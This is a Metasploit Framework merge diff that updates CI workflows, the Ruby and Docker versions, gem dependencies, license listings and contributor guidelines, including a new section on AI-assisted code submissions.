Land #20456 , adds documentation for wordpress_cp_calendar_sqli auxiliary module

Add documentation for auxiliary/scanner/http/wordpress_cp_calendar_sqli
Fixes msftidy_docs issues
2025-10-02 08:02:12 +02:00 · 2025-10-02 07:39:48 +02:00 · 2025-10-02 07:36:10 +02:00 · 2025-10-01 06:48:16 +00:00 · 2025-10-01 08:39:26 +02:00 · 2025-09-29 15:34:40 +02:00
1695 changed files with 35643 additions and 14397 deletions
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.0'
+          - '3.3'

    name: Ruby ${{ matrix.ruby }}
    steps:
@@ -44,6 +44,7 @@ on:
      - 'Gemfile.lock'
      - 'data/templates/**'
      - 'modules/payloads/**'
+      - 'lib/msf/base/sessions/**'
      - 'lib/msf/core/payload/**'
      - 'lib/msf/core/**'
      - 'test/modules/**'
@@ -198,7 +198,8 @@ jobs:

      - name: Setup Ruby
        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
+          # Introduces flakiness when downloading zlib etc: https://github.com/sparklemotion/nokogiri/issues/3521
+          # BUNDLE_FORCE_RUBY_PLATFORM: true
          # Required for macos13 pg gem compilation
          PKG_CONFIG_PATH: "/usr/local/opt/libpq/lib/pkgconfig"
        # Pinned to avoid Windows compilation failure with nokogiri
@@ -268,12 +269,26 @@ jobs:
        working-directory: metasploit-payloads

      - name: Build Windows payloads via Visual Studio 2022 Build (Windows)
-        shell: cmd
+        shell: pwsh
        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2022' && inputs.build_metasploit_payloads }}
        run: |
-          cd c/meterpreter
-          git submodule init && git submodule update
-          make.bat
+          Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
+          dir
+          $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
+          $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
+          $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
+          $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
+          if ($process.ExitCode -eq 0) {
+            Write-Host "components have been successfully added"
+          } else {
+            Write-Host "components were not installed"
+            exit 1
+          }
+          Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
+          $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
+          Write-Host $r
+          $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
+          Write-Host $r
        working-directory: metasploit-payloads

      - name: Build Windows payloads via Visual Studio 2025 Build (Windows)
@@ -1 +1 @@
-3.2.8
+3.3.8
@@ -25,8 +25,10 @@ will be closed. We need to ensure the code we're adding to master is written to
 ## Expedited Module Creation Process
 We strive to respect the community that has given us so much, so in the odd situation where we get multiple submissions for the same vulnerability, generally we will work with the first person who assigns themselves to the issue or the first person that submits a good-faith PR.  A good-faith PR might not even work, but it will show that the author is working their way toward a solution.  Despite this general rule, there are rare circumstances where we may ask a contributor to step aside or allow a committer to take the lead on the creation of a new module if a complete and working module with documents has not already been submitted.  This kind of expedited module creation process comes up infrequently, and usually it involves high-profile or high priority modules that we have marked internally as time-critical: think KEV list, active exploitation campaigns, CISA announcements, etc.  In those cases, we may ask a contributor that is assigned to the issue or who has submitted an incomplete module to allow a committer to take over an issue or a module PR in the interest of getting a module out quickly.  If a contributor has submitted an incomplete module, they will remain as a co-author of the module and we may build directly onto the PR they submitted, leaving the original commits in the tree.  We sincerely hope that the original author will remain involved in this expedited module creation process.  We would appreciate testing, critiquing, and any assistance that can be offered.  If the module is complete but requires minor changes, we may ask the contributor to allow us to take over testing/verification and make these minor changes without asking so we can land the module as quickly as possible.  In these cases of minor code changes, the authorship of the module will remain unchanged.  We hope everyone involved in this expedited module creation process continues to feel valued and appreciated.

-### Code Contribution Do's & Don'ts:
+## Vibecoding, AI, and LLM
+My first job had a token ring LAN and I still own a Win98SE CD, so I'm not entirely sure what _vibecoding_ is, but we're cool with any coding technique you use to create a PR as long as it is tested, documented, and does what it says it does.  Untested code is incomplete code, and incomplete code should be marked as a draft PR or WIP (Work in Progress) until it is complete, tested, and ready for a committer to review.  We have had several sumbissions clearly from AI that were well-formatted, looked really neat, and did nothing it said it did.  While we have no problem with AI-assisted coding, please do not assume that the code generated by an AI or LLM is logically or even syntactically correct.

+### Code Contribution Do's & Don'ts:
 Keeping the following in mind gives your contribution the best chance of landing!

 #### <u>Pull Requests</u>
@@ -42,7 +44,7 @@ Keeping the following in mind gives your contribution the best chance of landing
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
-* **Do** test your code.
+* **Do** test your code and submit the test output in your PR with any sensitive information removed.
 * **Do** list [verification steps] so committers can test your code.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
@@ -85,7 +87,7 @@ When reporting Metasploit issues:
 * **Don't** attempt to report issues on a closed PR.

 If you need some more guidance, talk to the main body of open source contributors over on our
-[Metasploit Slack] or [#metasploit on Freenode IRC].
+[GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) or [Metasploit Slack]

 Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
 curve, so keep it up!
@@ -1,4 +1,4 @@
-FROM ruby:3.2.8-alpine3.21 AS builder
+FROM ruby:3.3.8-alpine3.21 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_CONFIG_ARGS="set force_ruby_platform 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
@@ -54,7 +54,7 @@ RUN mkdir -p $TOOLS_HOME/bin && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.2.8-alpine3.21
+FROM ruby:3.3.8-alpine3.21
 LABEL maintainer="Rapid7"
 ARG TARGETARCH

@@ -31,6 +31,8 @@ group :development do
 end

 group :development, :test do
+  # For ./tools/dev/update_gem_licenses.sh
+  gem 'license_finder', '5.11.1'
  # running documentation generation tasks and rspec tasks
  gem 'rake'
  # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
@@ -1,12 +1,12 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.73)
+    metasploit-framework (6.4.91)
      aarch64
      abbrev
-      actionpack (~> 7.1.0)
-      activerecord (~> 7.1.0)
-      activesupport (~> 7.1.0)
+      actionpack (~> 7.2.0)
+      activerecord (~> 7.2.0)
+      activesupport (~> 7.2.0)
      aws-sdk-ec2
      aws-sdk-ec2instanceconnect
      aws-sdk-iam
@@ -20,7 +20,6 @@ PATH
      bootsnap
      bson
      chunky_png
-      concurrent-ruby (= 1.3.4)
      csv
      dnsruby
      drb
@@ -38,16 +37,17 @@ PATH
      getoptlong
      hrr_rb_ssh-ed25519
      http-cookie
-      irb (~> 1.7.4)
+      irb
      jsobfu
      json
+      lru_redux
      metasm
      metasploit-concern
      metasploit-credential
      metasploit-model
      metasploit-payloads (= 2.0.221)
      metasploit_data_models (>= 6.0.7)
-      metasploit_payloads-mettle (= 1.0.42)
+      metasploit_payloads-mettle (= 1.0.45)
      mqtt
      msgpack (~> 1.6.0)
      mutex_m
@@ -65,11 +65,13 @@ PATH
      openvas-omp
      ostruct
      packetfu
+      parallel
      patch_finder
      pcaprub
      pdf-reader
      pg
      puma
+      rack
      railties
      rasn1 (= 0.14.0)
      rb-readline
@@ -103,6 +105,7 @@ PATH
      sinatra
      sqlite3 (= 1.7.3)
      sshkey
+      stringio (= 3.1.1)
      swagger-blocks
      syslog
      thin
@@ -124,41 +127,41 @@ GEM
    aarch64 (2.1.0)
      racc (~> 1.6)
    abbrev (0.1.2)
-    actionpack (7.1.5.1)
-      actionview (= 7.1.5.1)
-      activesupport (= 7.1.5.1)
+    actionpack (7.2.2.1)
+      actionview (= 7.2.2.1)
+      activesupport (= 7.2.2.1)
      nokogiri (>= 1.8.5)
      racc
-      rack (>= 2.2.4)
+      rack (>= 2.2.4, < 3.2)
      rack-session (>= 1.0.1)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.2)
      rails-html-sanitizer (~> 1.6)
-    actionview (7.1.5.1)
-      activesupport (= 7.1.5.1)
+      useragent (~> 0.16)
+    actionview (7.2.2.1)
+      activesupport (= 7.2.2.1)
      builder (~> 3.1)
      erubi (~> 1.11)
      rails-dom-testing (~> 2.2)
      rails-html-sanitizer (~> 1.6)
-    activemodel (7.1.5.1)
-      activesupport (= 7.1.5.1)
-    activerecord (7.1.5.1)
-      activemodel (= 7.1.5.1)
-      activesupport (= 7.1.5.1)
+    activemodel (7.2.2.1)
+      activesupport (= 7.2.2.1)
+    activerecord (7.2.2.1)
+      activemodel (= 7.2.2.1)
+      activesupport (= 7.2.2.1)
      timeout (>= 0.4.0)
-    activesupport (7.1.5.1)
+    activesupport (7.2.2.1)
      base64
      benchmark (>= 0.3)
      bigdecimal
-      concurrent-ruby (~> 1.0, >= 1.0.2)
+      concurrent-ruby (~> 1.0, >= 1.3.1)
      connection_pool (>= 2.2.5)
      drb
      i18n (>= 1.6, < 2)
      logger (>= 1.4.2)
      minitest (>= 5.1)
-      mutex_m
      securerandom (>= 0.3)
-      tzinfo (~> 2.0)
+      tzinfo (~> 2.0, >= 2.0.5)
    addressable (2.8.7)
      public_suffix (>= 2.0.2, < 7.0)
    afm (0.2.2)
@@ -204,35 +207,35 @@ GEM
    base64 (0.2.0)
    bcrypt (3.1.20)
    bcrypt_pbkdf (1.1.1)
-    benchmark (0.4.0)
-    bigdecimal (3.1.9)
+    benchmark (0.4.1)
+    bigdecimal (3.2.3)
    bindata (2.4.15)
    bootsnap (1.18.4)
      msgpack (~> 1.2)
-    bson (5.0.2)
+    bson (5.1.1)
    builder (3.3.0)
    byebug (11.1.3)
    chunky_png (1.4.0)
    coderay (1.1.3)
-    concurrent-ruby (1.3.4)
-    connection_pool (2.5.0)
+    concurrent-ruby (1.3.5)
+    connection_pool (2.5.3)
    cookiejar (0.3.4)
    crass (1.0.6)
    csv (3.3.2)
    daemons (1.4.1)
    date (3.4.1)
-    debug (1.8.0)
-      irb (>= 1.5.0)
-      reline (>= 0.3.1)
-    diff-lcs (1.6.0)
+    debug (1.10.0)
+      irb (~> 1.10)
+      reline (>= 0.3.8)
+    diff-lcs (1.6.2)
    dnsruby (1.72.4)
      base64 (~> 0.2.0)
      logger (~> 1.6.5)
      simpleidn (~> 0.2.1)
    docile (1.4.1)
    domain_name (0.6.20240107)
-    drb (2.2.1)
-    ed25519 (1.3.0)
+    drb (2.2.3)
+    ed25519 (1.4.0)
    elftools (1.3.1)
      bindata (~> 2)
    em-http-request (1.1.7)
@@ -244,13 +247,14 @@ GEM
    em-socksify (0.3.3)
      base64
      eventmachine (>= 1.0.0.beta.4)
+    erb (5.0.2)
    erubi (1.13.1)
    eventmachine (1.2.7)
-    factory_bot (6.5.1)
+    factory_bot (6.5.4)
      activesupport (>= 6.1.0)
-    factory_bot_rails (6.4.4)
+    factory_bot_rails (6.5.0)
      factory_bot (~> 6.5)
-      railties (>= 5.0.0)
+      railties (>= 6.1.0)
    faker (3.5.1)
      i18n (>= 1.8.11, < 2)
    faraday (2.7.11)
@@ -286,29 +290,41 @@ GEM
      mutex_m
    i18n (1.14.7)
      concurrent-ruby (~> 1.0)
-    io-console (0.8.0)
+    io-console (0.8.1)
    ipaddr (1.2.7)
-    irb (1.7.4)
-      reline (>= 0.3.6)
+    irb (1.15.2)
+      pp (>= 0.6.0)
+      rdoc (>= 4.0.0)
+      reline (>= 0.4.2)
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
    json (2.10.2)
    language_server-protocol (3.17.0.5)
+    license_finder (5.11.1)
+      bundler
+      rubyzip (>= 1, < 3)
+      thor
+      toml (= 0.2.0)
+      with_env (= 1.1.0)
+      xml-simple
    lint_roller (1.1.0)
    little-plugger (1.1.4)
    logger (1.6.6)
    logging (2.4.0)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.24.0)
+    loofah (2.24.1)
      crass (~> 1.0.2)
      nokogiri (>= 1.12.0)
+    lru_redux (1.1.0)
    memory_profiler (1.1.0)
    metasm (1.0.5)
-    metasploit-concern (5.0.4)
+    metasploit-concern (5.0.5)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
+      drb
+      mutex_m
      railties (~> 7.0)
      zeitwerk
    metasploit-credential (6.0.16)
@@ -325,9 +341,12 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (5.0.3)
+    metasploit-model (5.0.4)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
+      bigdecimal
+      drb
+      mutex_m
      railties (~> 7.0)
    metasploit-payloads (2.0.221)
    metasploit_data_models (6.0.9)
@@ -340,13 +359,13 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.42)
+    metasploit_payloads-mettle (1.0.45)
    method_source (1.1.0)
    mime-types (3.6.0)
      logger
      mime-types-data (~> 3.2015)
    mime-types-data (3.2025.0304)
-    mini_portile2 (2.8.8)
+    mini_portile2 (2.8.9)
    minitest (5.25.5)
    mqtt (0.6.0)
    msgpack (1.6.1)
@@ -369,7 +388,7 @@ GEM
    network_interface (0.0.4)
    nexpose (7.3.0)
    nio4r (2.7.4)
-    nokogiri (1.18.3)
+    nokogiri (1.18.9)
      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
    nori (2.7.1)
@@ -387,6 +406,7 @@ GEM
    parser (3.3.8.0)
      ast (~> 2.4.1)
      racc
+    parslet (1.8.2)
    patch_finder (1.0.2)
    pcaprub (0.13.3)
    pdf-reader (2.14.1)
@@ -396,6 +416,9 @@ GEM
      ruby-rc4
      ttfunk
    pg (1.5.9)
+    pp (0.6.2)
+      prettyprint
+    prettyprint (0.2.0)
    prism (1.4.0)
    pry (0.14.2)
      coderay (~> 1.1)
@@ -403,11 +426,14 @@ GEM
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
+    psych (5.2.6)
+      date
+      stringio
    public_suffix (6.0.1)
    puma (6.6.0)
      nio4r (~> 2.0)
    racc (1.8.1)
-    rack (2.2.13)
+    rack (2.2.17)
    rack-protection (3.2.0)
      base64 (>= 0.1.0)
      rack (~> 2.2, >= 2.2.4)
@@ -418,31 +444,34 @@ GEM
    rackup (1.0.1)
      rack (< 3)
      webrick
-    rails-dom-testing (2.2.0)
+    rails-dom-testing (2.3.0)
      activesupport (>= 5.0.0)
      minitest
      nokogiri (>= 1.6)
    rails-html-sanitizer (1.6.2)
      loofah (~> 2.21)
      nokogiri (>= 1.15.7, != 1.16.7, != 1.16.6, != 1.16.5, != 1.16.4, != 1.16.3, != 1.16.2, != 1.16.1, != 1.16.0.rc1, != 1.16.0)
-    railties (7.1.5.1)
-      actionpack (= 7.1.5.1)
-      activesupport (= 7.1.5.1)
-      irb
+    railties (7.2.2.1)
+      actionpack (= 7.2.2.1)
+      activesupport (= 7.2.2.1)
+      irb (~> 1.13)
      rackup (>= 1.0.0)
      rake (>= 12.2)
      thor (~> 1.0, >= 1.2.2)
      zeitwerk (~> 2.6)
    rainbow (3.1.1)
-    rake (13.2.1)
+    rake (13.3.0)
    rasn1 (0.14.0)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
+    rdoc (6.14.2)
+      erb
+      psych (>= 4.0.0)
    recog (3.1.14)
      nokogiri
    redcarpet (3.6.1)
    regexp_parser (2.10.0)
-    reline (0.6.0)
+    reline (0.6.2)
      io-console (~> 0.5)
    require_all (3.0.0)
    rex-arch (0.1.18)
@@ -458,9 +487,11 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.41)
+    rex-exploitation (0.1.44)
+      bigdecimal
      jsobfu
      metasm
+      racc
      rex-arch
      rex-encoder
      rex-text
@@ -472,11 +503,12 @@ GEM
      rex-arch
    rex-ole (0.1.9)
      rex-text
-    rex-powershell (0.1.101)
+    rex-powershell (0.1.103)
+      bigdecimal
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.16)
+    rex-random_identifier (0.1.20)
      bigdecimal
      rex-text
    rex-registry (0.1.6)
@@ -496,7 +528,7 @@ GEM
      bigdecimal
    rex-zip (0.1.6)
      rex-text
-    rexml (3.4.1)
+    rexml (3.4.4)
    rinda (0.2.0)
      drb
      forwardable
@@ -506,25 +538,25 @@ GEM
      rspec-core (~> 3.13.0)
      rspec-expectations (~> 3.13.0)
      rspec-mocks (~> 3.13.0)
-    rspec-core (3.13.3)
+    rspec-core (3.13.5)
      rspec-support (~> 3.13.0)
-    rspec-expectations (3.13.3)
+    rspec-expectations (3.13.5)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-mocks (3.13.2)
+    rspec-mocks (3.13.5)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-rails (7.1.1)
-      actionpack (>= 7.0)
-      activesupport (>= 7.0)
-      railties (>= 7.0)
+    rspec-rails (8.0.1)
+      actionpack (>= 7.2)
+      activesupport (>= 7.2)
+      railties (>= 7.2)
      rspec-core (~> 3.13)
      rspec-expectations (~> 3.13)
      rspec-mocks (~> 3.13)
      rspec-support (~> 3.13)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.13.2)
+    rspec-support (3.13.4)
    rubocop (1.75.7)
      json (~> 2.3)
      language_server-protocol (~> 3.17.0.2)
@@ -541,7 +573,8 @@ GEM
      prism (~> 1.4)
    ruby-macho (4.1.0)
    ruby-mysql (4.2.0)
-    ruby-prof (1.7.1)
+    ruby-prof (1.7.2)
+      base64
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
@@ -571,6 +604,7 @@ GEM
    sqlite3 (1.7.3)
      mini_portile2 (~> 2.8.0)
    sshkey (3.0.0)
+    stringio (3.1.1)
    strptime (0.2.5)
    swagger-blocks (3.0.0)
    syslog (0.3.0)
@@ -580,10 +614,12 @@ GEM
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
-    thor (1.3.2)
+    thor (1.4.0)
    tilt (2.6.0)
    timecop (0.9.10)
    timeout (0.4.3)
+    toml (0.2.0)
+      parslet (~> 1.8.0)
    ttfunk (1.8.0)
      bigdecimal (~> 3.1)
    tzinfo (2.0.6)
@@ -594,6 +630,7 @@ GEM
      unicode-emoji (~> 4.0, >= 4.0.4)
    unicode-emoji (4.0.4)
    unix-crypt (1.3.1)
+    useragent (0.16.11)
    warden (1.2.9)
      rack (>= 2.0.9)
    webrick (1.9.1)
@@ -613,13 +650,16 @@ GEM
      nori (~> 2.0, >= 2.7.1)
      rexml (~> 3.0)
      rubyntlm (~> 0.6.0, >= 0.6.3)
+    with_env (1.1.0)
    xdr (3.0.3)
      activemodel (>= 4.2, < 8.0)
      activesupport (>= 4.2, < 8.0)
+    xml-simple (1.1.9)
+      rexml
    xmlrpc (0.3.3)
      webrick
    yard (0.9.37)
-    zeitwerk (2.7.2)
+    zeitwerk (2.7.3)

 PLATFORMS
  ruby
@@ -629,6 +669,7 @@ DEPENDENCIES
  debug (>= 1.0.0)
  factory_bot_rails
  fivemat
+  license_finder (= 5.11.1)
  memory_profiler
  metasploit-framework!
  octokit
@@ -645,4 +686,4 @@ DEPENDENCIES
  yard

 BUNDLED WITH
-   2.5.10
+   2.5.22
@@ -2,11 +2,11 @@ This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 2.0.1, MIT
 aarch64, 2.1.0, "Apache 2.0"
 abbrev, 0.1.2, "ruby, Simplified BSD"
-actionpack, 7.1.5.1, MIT
-actionview, 7.1.5.1, MIT
-activemodel, 7.1.5.1, MIT
-activerecord, 7.1.5.1, MIT
-activesupport, 7.1.5.1, MIT
+actionpack, 7.2.2.1, MIT
+actionview, 7.2.2.1, MIT
+activemodel, 7.2.2.1, MIT
+activerecord, 7.2.2.1, MIT
+activesupport, 7.2.2.1, MIT
 addressable, 2.8.7, "Apache 2.0"
 afm, 0.2.2, MIT
 allure-rspec, 2.26.0, "Apache 2.0"
@@ -26,37 +26,38 @@ aws-sigv4, 1.11.0, "Apache 2.0"
 base64, 0.2.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
 bcrypt_pbkdf, 1.1.1, MIT
-benchmark, 0.4.0, "ruby, Simplified BSD"
-bigdecimal, 3.1.9, "ruby, Simplified BSD"
+benchmark, 0.4.1, "ruby, Simplified BSD"
+bigdecimal, 3.2.2, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
 bootsnap, 1.18.4, MIT
-bson, 5.0.2, "Apache 2.0"
+bson, 5.1.1, "Apache 2.0"
 builder, 3.3.0, MIT
-bundler, 2.5.10, MIT
+bundler, 2.5.22, MIT
 byebug, 11.1.3, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.3.4, MIT
-connection_pool, 2.5.0, MIT
+concurrent-ruby, 1.3.5, MIT
+connection_pool, 2.5.3, MIT
 cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
 csv, 3.3.2, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
 date, 3.4.1, "ruby, Simplified BSD"
-debug, 1.8.0, "ruby, Simplified BSD"
-diff-lcs, 1.6.0, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
+debug, 1.10.0, "ruby, Simplified BSD"
+diff-lcs, 1.6.2, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
 dnsruby, 1.72.4, "Apache 2.0"
 docile, 1.4.1, MIT
 domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
-drb, 2.2.1, "ruby, Simplified BSD"
-ed25519, 1.3.0, MIT
+drb, 2.2.3, "ruby, Simplified BSD"
+ed25519, 1.4.0, MIT
 elftools, 1.3.1, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.3, MIT
+erb, 5.0.2, "ruby, Simplified BSD"
 erubi, 1.13.1, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.5.1, MIT
-factory_bot_rails, 6.4.4, MIT
+factory_bot, 6.5.4, MIT
+factory_bot_rails, 6.5.0, MIT
 faker, 3.5.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
@@ -77,31 +78,33 @@ http-cookie, 1.0.8, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.9.0, ruby
 i18n, 1.14.7, MIT
-io-console, 0.8.0, "ruby, Simplified BSD"
+io-console, 0.8.1, "ruby, Simplified BSD"
 ipaddr, 1.2.7, "ruby, Simplified BSD"
-irb, 1.7.4, "ruby, Simplified BSD"
+irb, 1.15.2, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.10.2, ruby
 language_server-protocol, 3.17.0.5, MIT
+license_finder, 5.11.1, MIT
 lint_roller, 1.1.0, MIT
 little-plugger, 1.1.4, MIT
 logger, 1.6.6, "ruby, Simplified BSD"
 logging, 2.4.0, MIT
-loofah, 2.24.0, MIT
+loofah, 2.24.1, MIT
+lru_redux, 1.1.0, MIT
 memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 5.0.4, "New BSD"
+metasploit-concern, 5.0.5, "New BSD"
 metasploit-credential, 6.0.16, "New BSD"
-metasploit-framework, 6.4.73, "New BSD"
-metasploit-model, 5.0.3, "New BSD"
+metasploit-framework, 6.4.91, "New BSD"
+metasploit-model, 5.0.4, "New BSD"
 metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.9, "New BSD"
-metasploit_payloads-mettle, 1.0.42, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 1.0.45, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
 mime-types, 3.6.0, MIT
 mime-types-data, 3.2025.0304, MIT
-mini_portile2, 2.8.8, MIT
+mini_portile2, 2.8.9, MIT
 minitest, 5.25.5, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
@@ -118,7 +121,7 @@ net-ssh, 7.3.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.7.4, "MIT, Simplified BSD"
-nokogiri, 1.18.3, MIT
+nokogiri, 1.18.9, MIT
 nori, 2.7.1, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
@@ -128,32 +131,37 @@ ostruct, 0.6.1, "ruby, Simplified BSD"
 packetfu, 2.0.0, "New BSD"
 parallel, 1.27.0, MIT
 parser, 3.3.8.0, MIT
+parslet, 1.8.2, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.3, LGPL-2.1
 pdf-reader, 2.14.1, MIT
 pg, 1.5.9, "Simplified BSD"
+pp, 0.6.2, "ruby, Simplified BSD"
+prettyprint, 0.2.0, "ruby, Simplified BSD"
 prism, 1.4.0, MIT
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
+psych, 5.2.6, MIT
 public_suffix, 6.0.1, MIT
 puma, 6.6.0, "New BSD"
 racc, 1.8.1, "ruby, Simplified BSD"
-rack, 2.2.13, MIT
+rack, 2.2.17, MIT
 rack-protection, 3.2.0, MIT
 rack-session, 1.0.2, MIT
 rack-test, 2.2.0, MIT
 rackup, 1.0.1, MIT
-rails-dom-testing, 2.2.0, MIT
+rails-dom-testing, 2.3.0, MIT
 rails-html-sanitizer, 1.6.2, MIT
-railties, 7.1.5.1, MIT
+railties, 7.2.2.1, MIT
 rainbow, 3.1.1, MIT
-rake, 13.2.1, MIT
+rake, 13.3.0, MIT
 rasn1, 0.14.0, MIT
 rb-readline, 0.5.5, BSD
+rdoc, 6.14.2, ruby
 recog, 3.1.14, unknown
 redcarpet, 3.6.1, MIT
 regexp_parser, 2.10.0, MIT
-reline, 0.6.0, ruby
+reline, 0.6.2, ruby
 require_all, 3.0.0, MIT
 rex-arch, 0.1.18, "New BSD"
 rex-bin_tools, 0.1.10, "New BSD"
@@ -164,8 +172,8 @@ rex-java, 0.1.8, "New BSD"
 rex-mime, 0.1.11, "New BSD"
 rex-nop, 0.1.4, "New BSD"
 rex-ole, 0.1.9, "New BSD"
-rex-powershell, 0.1.101, "New BSD"
-rex-random_identifier, 0.1.16, "New BSD"
+rex-powershell, 0.1.103, "New BSD"
+rex-random_identifier, 0.1.20, "New BSD"
 rex-registry, 0.1.6, "New BSD"
 rex-rop_builder, 0.1.6, "New BSD"
 rex-socket, 0.1.62, "New BSD"
@@ -177,17 +185,17 @@ rexml, 3.4.1, "Simplified BSD"
 rinda, 0.2.0, "ruby, Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.13.0, MIT
-rspec-core, 3.13.3, MIT
-rspec-expectations, 3.13.3, MIT
-rspec-mocks, 3.13.2, MIT
-rspec-rails, 7.1.1, MIT
+rspec-core, 3.13.5, MIT
+rspec-expectations, 3.13.5, MIT
+rspec-mocks, 3.13.5, MIT
+rspec-rails, 8.0.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.13.2, MIT
+rspec-support, 3.13.4, MIT
 rubocop, 1.75.7, MIT
 rubocop-ast, 1.44.1, MIT
 ruby-macho, 4.1.0, MIT
 ruby-mysql, 4.2.0, MIT
-ruby-prof, 1.7.1, "Simplified BSD"
+ruby-prof, 1.7.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
@@ -202,21 +210,24 @@ simpleidn, 0.2.3, MIT
 sinatra, 3.2.0, MIT
 sqlite3, 1.7.3, "New BSD"
 sshkey, 3.0.0, MIT
+stringio, 3.1.1, "ruby, Simplified BSD"
 strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
 syslog, 0.3.0, "ruby, Simplified BSD"
 test-prof, 1.4.4, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
-thor, 1.3.2, MIT
+thor, 1.4.0, MIT
 tilt, 2.6.0, MIT
 timecop, 0.9.10, MIT
 timeout, 0.4.3, "ruby, Simplified BSD"
+toml, 0.2.0, MIT
 ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2025.1, MIT
 unicode-display_width, 3.1.4, MIT
 unicode-emoji, 4.0.4, MIT
 unix-crypt, 1.3.1, 0BSD
+useragent, 0.16.11, MIT
 warden, 1.2.9, MIT
 webrick, 1.9.1, "ruby, Simplified BSD"
 websocket-driver, 0.7.7, "Apache 2.0"
@@ -224,7 +235,9 @@ websocket-extensions, 0.1.5, "Apache 2.0"
 win32api, 0.1.0, unknown
 windows_error, 0.1.5, BSD
 winrm, 2.3.9, "Apache 2.0"
+with_env, 1.1.0, MIT
 xdr, 3.0.3, "Apache 2.0"
+xml-simple, 1.1.9, MIT
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
 yard, 0.9.37, MIT
-zeitwerk, 2.7.2, MIT
+zeitwerk, 2.7.3, MIT
@@ -18,7 +18,14 @@ Submit bugs and feature requests via the [GitHub Issues](https://github.com/rapi
